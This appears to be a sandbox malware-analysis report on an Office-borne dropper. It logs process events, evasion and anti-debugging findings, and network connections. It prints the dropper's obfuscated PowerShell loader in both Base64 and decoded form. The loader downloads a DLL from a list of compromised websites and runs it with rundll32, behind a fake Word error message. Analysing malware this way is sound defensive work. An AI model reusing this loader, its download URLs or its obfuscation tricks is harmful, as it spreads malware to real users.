Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1476

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: powershell.exe, 00000004.00000002.2158965365.0000000000404000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 6_2_10001D4D mov eax, dword ptr fs:[00000030h]

6_2_10001D4D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Memory protected: page execute read | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 51.255.203.164 144
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 84.232.229.24 80

Encrypted powershell cmdline option found

Show sources

Source: unknown	Process created: Base64 decoded SET-iTeM varIaBLE:PGB ( [TYPe]("{2}{4}{5}{1}{0}{3}" -f'.Dir','m.IO','Sy','ECToRy','St','E')); sET ('29x'+'d'+'4M') ( [TYpE]("{7}{1}{2}{3}{6}{4}{0}{5}" -f'Na','ys','TeM.NEt','.SErVi','ePOinTmA','GeR','C','s') );$Xjb6uu9=$S_7W + [char](64) + $C96Z;$A29Y=(('T'+'65')+'Q'); $pgB::"cr`EaT`eDIr`Ect`oRy"($HOME + (('db'+('zVl'+'j0ta0d')+'bz'+('M'+'tkd4'+'y0')+('db'+'z'))."r`E`PLAce"(([cHaR]100+[cHaR]98+[cHaR]122),'\')));$X13H=(('T'+'66')+'L'); (VaRiABLe ('29x'+'d'+'4M') ).VALue::"SeCUR`ITY`P`R`OTOCOL" = ('Tl'+('s'+'12'));$E34Q=(('Q_'+'1')+'L');$I3laa23 = (('O8'+'_')+'N');$W96Y=(('P'+'51')+'D');$Iq6rfg0=$HOME+((('o'+'6nV')+('lj0t'+'a0o')+'6n'+'Mt'+('kd'+'4')+('y'+'0o6')+'n')-crEPlACE ([chAr]111+[chAr]54+[chAr]110),[chAr]92)+$I3laa23+('.'+('dl'+'l'));$S84B=('O'+('32'+'I'));$Ozx9xkd=('s'+'g'+(' yw'+' a'+'h'+':'+'//riandut')+('r'+'a.com/e')+'m'+'a'+('il/'+'A'+'fhE8z0/')+('@s'+'g yw')+(' a'+'h:')+'//'+'c'+('al'+'le'+'dtoch'+'a')+('nge'+'.org'+'/C')+'a'+('l'+'ledt')+'o'+'C'+'h'+('an'+'g')+('e/8huS'+'O'+'d/')+('@s'+'g yw')+(' ah'+'s:/'+'/m'+'rveggy.c'+'om/wp-admi'+'n')+('/'+'n/@')+'s'+('g yw'+' a')+'h'+'s'+(':'+'//n')+('orail'+'y')+'a'+('.'+'co'+'m/dr')+'up'+('al'+'/')+('r'+'etA')+'l'+('/'+'@sg')+' y'+('w ahs:'+'/')+'/'+('hbprivi'+'l'+'e'+'g')+'e'+'d.'+'co'+('m/cg'+'i-bin'+'/Qg')+('/@s'+'g y'+'w')+(' '+'ahs')+':'+'//'+'u'+'mm'+('ahstar'+'s.'+'com')+'/'+('ap'+'p_')+'o'+('ld_'+'m')+('ay_'+'2')+'0'+('18'+'/')+('as'+'sets')+('/'+'wDL8'+'x')+'/'+('@s'+'g ')+('y'+'w ')+('ah'+'s')+'
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded SET-iTeM varIaBLE:PGB ( [TYPe]("{2}{4}{5}{1}{0}{3}" -f'.Dir','m.IO','Sy','ECToRy','St','E')); sET ('29x'+'d'+'4M') ( [TYpE]("{7}{1}{2}{3}{6}{4}{0}{5}" -f'Na','ys','TeM.NEt','.SErVi','ePOinTmA','GeR','C','s') );$Xjb6uu9=$S_7W + [char](64) + $C96Z;$A29Y=(('T'+'65')+'Q'); $pgB::"cr`EaT`eDIr`Ect`oRy"($HOME + (('db'+('zVl'+'j0ta0d')+'bz'+('M'+'tkd4'+'y0')+('db'+'z'))."r`E`PLAce"(([cHaR]100+[cHaR]98+[cHaR]122),'\')));$X13H=(('T'+'66')+'L'); (VaRiABLe ('29x'+'d'+'4M') ).VALue::"SeCUR`ITY`P`R`OTOCOL" = ('Tl'+('s'+'12'));$E34Q=(('Q_'+'1')+'L');$I3laa23 = (('O8'+'_')+'N');$W96Y=(('P'+'51')+'D');$Iq6rfg0=$HOME+((('o'+'6nV')+('lj0t'+'a0o')+'6n'+'Mt'+('kd'+'4')+('y'+'0o6')+'n')-crEPlACE ([chAr]111+[chAr]54+[chAr]110),[chAr]92)+$I3laa23+('.'+('dl'+'l'));$S84B=('O'+('32'+'I'));$Ozx9xkd=('s'+'g'+(' yw'+' a'+'h'+':'+'//riandut')+('r'+'a.com/e')+'m'+'a'+('il/'+'A'+'fhE8z0/')+('@s'+'g yw')+(' a'+'h:')+'//'+'c'+('al'+'le'+'dtoch'+'a')+('nge'+'.org'+'/C')+'a'+('l'+'ledt')+'o'+'C'+'h'+('an'+'g')+('e/8huS'+'O'+'d/')+('@s'+'g yw')+(' ah'+'s:/'+'/m'+'rveggy.c'+'om/wp-admi'+'n')+('/'+'n/@')+'s'+('g yw'+' a')+'h'+'s'+(':'+'//n')+('orail'+'y')+'a'+('.'+'co'+'m/dr')+'up'+('al'+'/')+('r'+'etA')+'l'+('/'+'@sg')+' y'+('w ahs:'+'/')+'/'+('hbprivi'+'l'+'e'+'g')+'e'+'d.'+'co'+('m/cg'+'i-bin'+'/Qg')+('/@s'+'g y'+'w')+(' '+'ahs')+':'+'//'+'u'+'mm'+('ahstar'+'s.'+'com')+'/'+('ap'+'p_')+'o'+('ld_'+'m')+('ay_'+'2')+'0'+('18'+'/')+('as'+'sets')+('/'+'wDL8'+'x')+'/'+('@s'+'g ')+('y'+'w ')+('ah'+'s')+'			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAAC	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gyuopigcwtoen\gfvxluzjzkjy.upj',FOsZnZScT	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gyuopigcwtoen\gfvxluzjzkjy.upj',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ofzzkuwngkcnufwj\wvmgxwsmudidtny.hvy',nQAMXkchr	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ofzzkuwngkcnufwj\wvmgxwsmudidtny.hvy',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wjzei\rjte.fnz',ggJG	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wjzei\rjte.fnz',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hrjzsjr\mlycub.kot',dIFPdOFPiwZFUl	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hrjzsjr\mlycub.kot',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cqtptfsfibbnlgn\rmzbyllndllgsq.bnt',OpIYBjvoaiwa	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cqtptfsfibbnlgn\rmzbyllndllgsq.bnt',#1

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAA